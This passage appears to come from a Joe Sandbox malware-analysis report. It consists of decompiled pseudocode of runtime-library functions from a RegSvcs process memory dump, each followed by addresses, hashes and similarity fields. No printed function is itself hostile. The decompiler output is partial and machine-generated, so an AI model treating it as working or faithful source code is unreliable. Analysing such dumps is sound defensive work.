				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x13e85ec;
				E01312280(_t48, 0x13e85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0130FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x13e538c; // 0x77e46828
					if( *_t84 != 0x13e5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x13cf6e8);
						E0134D0E8(0x13e85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E013C88F5(_t80, _t85, 0x13e5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x13e86c0; // 0xe907b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x13e86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01312280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E013C88F5(0x13e85ec, _t85, 0x13e5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0133AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x13eb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x13e84c0;
																			if(_t82 >=  *0x13e84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E013C9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E012F922A(_t99);
										_t64 = E01317D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E013C8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x13e86c0; // 0xe907b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x13e86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x13e86bc;
													_t87 = 0x13e86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E012F9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x13e86c4;
												_t87 = 0x13e86c0;
												L27:
												E01329B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0134D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x13e5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x13e538c = _t51;
						goto L6;
					}
				}
			}




















                                          0x012f9082
                                          0x012f9083
                                          0x012f9084
                                          0x012f9085
                                          0x012f9087
                                          0x012f9096
                                          0x012f9098
                                          0x012f9098
                                          0x012f909e
                                          0x012f90a8
                                          0x012f90e7
                                          0x012f90e7
                                          0x012f90aa
                                          0x012f90b0
                                          0x012f90b7
                                          0x012f90bd
                                          0x012f90dd
                                          0x012f90e6
                                          0x012f90bf
                                          0x012f90bf
                                          0x012f90c7
                                          0x012f90cf
                                          0x012f90f1
                                          0x012f90f2
                                          0x012f90f4
                                          0x012f90f5
                                          0x012f90f6
                                          0x012f90f7
                                          0x012f90f8
                                          0x012f90f9
                                          0x012f90fa
                                          0x012f90fb
                                          0x012f90fc
                                          0x012f90fd
                                          0x012f90fe
                                          0x012f90ff
                                          0x012f9100
                                          0x012f9102
                                          0x012f9107
                                          0x012f910c
                                          0x012f9110
                                          0x012f9113
                                          0x012f9115
                                          0x012f9136
                                          0x012f913f
                                          0x012f9143
                                          0x013537e4
                                          0x013537e4
                                          0x012f9117
                                          0x012f9117
                                          0x012f911d
                                          0x00000000
                                          0x012f911f
                                          0x012f911f
                                          0x012f9125
                                          0x00000000
                                          0x012f9127
                                          0x012f912d
                                          0x012f9130
                                          0x012f9134
                                          0x012f9158
                                          0x012f915d
                                          0x012f9161
                                          0x012f9168
                                          0x01353715
                                          0x012f916e
                                          0x012f916e
                                          0x012f9175
                                          0x012f9177
                                          0x012f917e
                                          0x012f917f
                                          0x012f9182
                                          0x012f9182
                                          0x012f9187
                                          0x012f9187
                                          0x012f918a
                                          0x012f918d
                                          0x012f918f
                                          0x012f9192
                                          0x012f9195
                                          0x012f9198
                                          0x012f9198
                                          0x012f9198
                                          0x012f919a
                                          0x00000000
                                          0x00000000
                                          0x0135371f
                                          0x01353721
                                          0x01353727
                                          0x0135372f
                                          0x01353733
                                          0x01353735
                                          0x01353738
                                          0x0135373b
                                          0x0135373d
                                          0x01353740
                                          0x00000000
                                          0x01353746
                                          0x01353746
                                          0x01353749
                                          0x00000000
                                          0x0135374f
                                          0x0135374f
                                          0x01353751
                                          0x01353757
                                          0x01353759
                                          0x0135375c
                                          0x0135375c
                                          0x0135375e
                                          0x0135375e
                                          0x01353761
                                          0x01353764
                                          0x00000000
                                          0x00000000
                                          0x01353766
                                          0x01353768
                                          0x013537a3
                                          0x013537a3
                                          0x013537a5
                                          0x013537a7
                                          0x013537ad
                                          0x013537b0
                                          0x013537b2
                                          0x013537bc
                                          0x013537c2
                                          0x013537c2
                                          0x013537b2
                                          0x012f9187
                                          0x012f9187
                                          0x012f918a
                                          0x012f918d
                                          0x012f918f
                                          0x012f9192
                                          0x012f9195
                                          0x00000000
                                          0x012f9195
                                          0x00000000
                                          0x0135376a
                                          0x0135376a
                                          0x0135376a
                                          0x0135376c
                                          0x0135376c
                                          0x0135376f
                                          0x01353775
                                          0x00000000
                                          0x00000000
                                          0x01353777
                                          0x01353779
                                          0x01353782
                                          0x01353787
                                          0x01353789
                                          0x01353790
                                          0x01353790
                                          0x0135378b
                                          0x0135378b
                                          0x0135378b
                                          0x01353792
                                          0x01353795
                                          0x00000000
                                          0x01353795
                                          0x00000000
                                          0x01353779
                                          0x01353798
                                          0x00000000
                                          0x01353798
                                          0x00000000
                                          0x01353768
                                          0x0135379b
                                          0x0135379b
                                          0x01353751
                                          0x01353749
                                          0x00000000
                                          0x01353740
                                          0x012f91a0
                                          0x012f91a3
                                          0x012f91a9
                                          0x012f91b0
                                          0x00000000
                                          0x012f91b0
                                          0x012f9187
                                          0x012f91b4
                                          0x012f91b4
                                          0x012f91bb
                                          0x012f91c0
                                          0x012f91c5
                                          0x012f91c7
                                          0x013537da
                                          0x012f91cd
                                          0x012f91cd
                                          0x012f91cd
                                          0x012f91d2
                                          0x012f91d5
                                          0x012f9239
                                          0x012f9239
                                          0x012f91d7
                                          0x012f91db
                                          0x012f91e1
                                          0x012f91e7
                                          0x012f91fd
                                          0x012f9203
                                          0x012f921e
                                          0x012f9223
                                          0x00000000
                                          0x012f9205
                                          0x012f9205
                                          0x012f9208
                                          0x012f920c
                                          0x012f9214
                                          0x012f9214
                                          0x012f920c
                                          0x012f91e9
                                          0x012f91e9
                                          0x012f91ee
                                          0x012f91f3
                                          0x012f91f3
                                          0x012f91f3
                                          0x012f91e7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x012f9134
                                          0x012f9125
                                          0x012f911d
                                          0x012f914e
                                          0x012f90d1
                                          0x012f90d1
                                          0x012f90d3
                                          0x012f90d6
                                          0x012f90d8
                                          0x00000000
                                          0x012f90d8
                                          0x012f90cf

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d875adde93268fdcade6389191b2929673e68fa44dc9a98204a97913bfe9d2d6
                                          • Instruction ID: c771d14339b705479f38f59b65a0f48c143933b71235cd8409688a79fbfc41c0
                                          • Opcode Fuzzy Hash: d875adde93268fdcade6389191b2929673e68fa44dc9a98204a97913bfe9d2d6
                                          • Instruction Fuzzy Hash: 3001DC72A212018FC72A9F08D840B12BBE9EB81328F21407EE7018B6D2C674DC81CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0138C450 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E0138C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01339910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E013395B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E013395D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E013395D0();
				return L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                          0x0138c458
                                          0x0138c45d
                                          0x0138c466
                                          0x0138c468
                                          0x0138c469
                                          0x0138c46a
                                          0x0138c46b
                                          0x0138c46e
                                          0x0138c46f
                                          0x0138c471
                                          0x0138c476
                                          0x0138c476
                                          0x0138c47c
                                          0x0138c47e
                                          0x0138c480
                                          0x0138c480
                                          0x0138c483
                                          0x0138c484
                                          0x0138c486
                                          0x0138c488
                                          0x0138c48f
                                          0x0138c491
                                          0x0138c493
                                          0x0138c493
                                          0x0138c48f
                                          0x0138c498
                                          0x0138c49e
                                          0x0138c4ad
                                          0x0138c4ad
                                          0x0138c4b2
                                          0x0138c4b4
                                          0x0138c4cd

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction ID: fee40f4b07e15e90b8659378347cd0eaaeef6f7acc19939246c4208905ac5066
                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction Fuzzy Hash: E4018472140606FFE616AF6DCC80EA2FB6DFB94358F004525F214535A0C761ACA1C7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C4015 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E013C4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01312280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01312280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x13e86ac);
					E012FF900(0x13e86d4, _t28);
					E0130FFB0(0x13e86ac, _t28, 0x13e86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0130FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                          0x013c401a
                                          0x013c401e
                                          0x013c4023
                                          0x013c4028
                                          0x013c4029
                                          0x013c402b
                                          0x013c402f
                                          0x013c4043
                                          0x013c4046
                                          0x013c4051
                                          0x013c4057
                                          0x013c405f
                                          0x013c4062
                                          0x013c4067
                                          0x013c406f
                                          0x013c407c
                                          0x013c407c
                                          0x013c408c
                                          0x013c408c
                                          0x013c4097

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c6a38422f438e55c3b067de0c20eea117fc8e33ac8049dbda1894e205e7aadad
                                          • Instruction ID: 11e9fab25adc66dec3122ec3ce82a3571c6eedfd189a4a0d4ecd05bfd96b704a
                                          • Opcode Fuzzy Hash: c6a38422f438e55c3b067de0c20eea117fc8e33ac8049dbda1894e205e7aadad
                                          • Instruction Fuzzy Hash: CA01F7722416467FC315AB7DCD80E57F7ECFF55668B000229F60883A51CB24EC12CAE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B138A Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 61%
                                          			E013B138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x13ed360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0133FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01317D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0133B640(E01339AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                          0x013b138a
                                          0x013b138a
                                          0x013b1399
                                          0x013b13a3
                                          0x013b13a8
                                          0x013b13aa
                                          0x013b13b5
                                          0x013b13bb
                                          0x013b13c3
                                          0x013b13c6
                                          0x013b13c9
                                          0x013b13d4
                                          0x013b13e6
                                          0x013b13d6
                                          0x013b13df
                                          0x013b13df
                                          0x013b13f1
                                          0x013b13f2
                                          0x013b13f4
                                          0x013b13f9
                                          0x013b140e

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c142e02149ee177c2f56984833bbbbf69d66035cd05e3a0a999b91a348e74108
                                          • Instruction ID: 0899cda93d16ce6ae7e3368e1e102560fc73c51a876516f77d9b6cfa2036abf2
                                          • Opcode Fuzzy Hash: c142e02149ee177c2f56984833bbbbf69d66035cd05e3a0a999b91a348e74108
                                          • Instruction Fuzzy Hash: 2A015271E0121DAFDB14DFA9D881FAEBBB8EF44714F404056B904EB680E6749A41CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B14FB Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 61%
                                          			E013B14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x13ed360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0133FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01317D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0133B640(E01339AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                          0x013b14fb
                                          0x013b14fb
                                          0x013b150a
                                          0x013b1514
                                          0x013b1519
                                          0x013b151b
                                          0x013b1526
                                          0x013b152c
                                          0x013b1534
                                          0x013b1537
                                          0x013b153a
                                          0x013b1545
                                          0x013b1557
                                          0x013b1547
                                          0x013b1550
                                          0x013b1550
                                          0x013b1562
                                          0x013b1563
                                          0x013b1565
                                          0x013b156a
                                          0x013b157f

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0dac51584bcd020086b32624dd4d86ec9afc443658e0404c7e387978a61e1aaa
                                          • Instruction ID: 457dad2bf3054337ed61fd0dfa2e10df80385e93a46c56681c42d4063bebb1e9
                                          • Opcode Fuzzy Hash: 0dac51584bcd020086b32624dd4d86ec9afc443658e0404c7e387978a61e1aaa
                                          • Instruction Fuzzy Hash: B2018C71A0024CEFDB14DFACD841FAEBBB8EF84714F444066B914EB280EA70DA01CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012F58EC Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E012F58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x13ed360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x12d5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E012F5943() != 0 &&  *0x13e5320 > 5) {
					E01377B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01377B5E( &_v28, _t28);
					_t11 = E01377B9C(0x13e5320, 0x12dbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0133B640(_t11, _t17, _v8 ^ _t29, 0x12dbf15, _t27, _t28);
			}















                                          0x012f58fb
                                          0x012f58fe
                                          0x012f5906
                                          0x012f590a
                                          0x012f593c
                                          0x012f593c
                                          0x012f590c
                                          0x012f590c
                                          0x012f5911
                                          0x00000000
                                          0x012f5913
                                          0x012f5913
                                          0x012f5913
                                          0x012f5911
                                          0x012f591d
                                          0x01351035
                                          0x0135103c
                                          0x0135103f
                                          0x01351056
                                          0x01351056
                                          0x012f593b

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 99c65a0651ef2145b12505665419698b6281ae3a46ff8b4b27e34fe0f3e107f8
                                          • Instruction ID: 3b04081b90fe577b81fab35e3609579138ef6ca3b451013f3278120f008b8a84
                                          • Opcode Fuzzy Hash: 99c65a0651ef2145b12505665419698b6281ae3a46ff8b4b27e34fe0f3e107f8
                                          • Instruction Fuzzy Hash: 1401A235A20609DBD728EA6DD805ABEBBACEF81274F55007DAB059B284DE70DD05C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0130B02A Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0130B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01317D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01377016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                          0x0130b037
                                          0x0130b039
                                          0x0130b03b
                                          0x0130b040
                                          0x0135a60e
                                          0x00000000
                                          0x00000000
                                          0x0135a61d
                                          0x0130b04b
                                          0x0130b04e
                                          0x0135a627
                                          0x0135a634
                                          0x00000000
                                          0x00000000
                                          0x0135a641
                                          0x0135a653
                                          0x0135a643
                                          0x0135a64c
                                          0x0135a64c
                                          0x0135a65b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0135a66c
                                          0x0130b057
                                          0x0130b057
                                          0x0130b057
                                          0x0130b046
                                          0x0130b046
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction ID: 5898abbd91d2a85e0635f71c158de53e126648b33b50358d0e85feb0cf733214
                                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction Fuzzy Hash: 420184762005849FE327C71CC958F66BBDCEB85B58F0900A1FA15CBA95D738DC40D621
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C1074 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E013C1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E013C165E(__ebx, 0x13e8ae4, (__edx -  *0x13e8b04 >> 0x14) + (__edx -  *0x13e8b04 >> 0x14), __edi, __ecx, (__edx -  *0x13e8b04 >> 0x14) + (__edx -  *0x13e8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E013BAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01317D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E013AFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                          0x013c1074
                                          0x013c1080
                                          0x013c1082
                                          0x013c108a
                                          0x013c108f
                                          0x013c1093
                                          0x013c10ab
                                          0x013c10ab
                                          0x013c10c3
                                          0x013c10cf
                                          0x013c10e1
                                          0x013c10d1
                                          0x013c10da
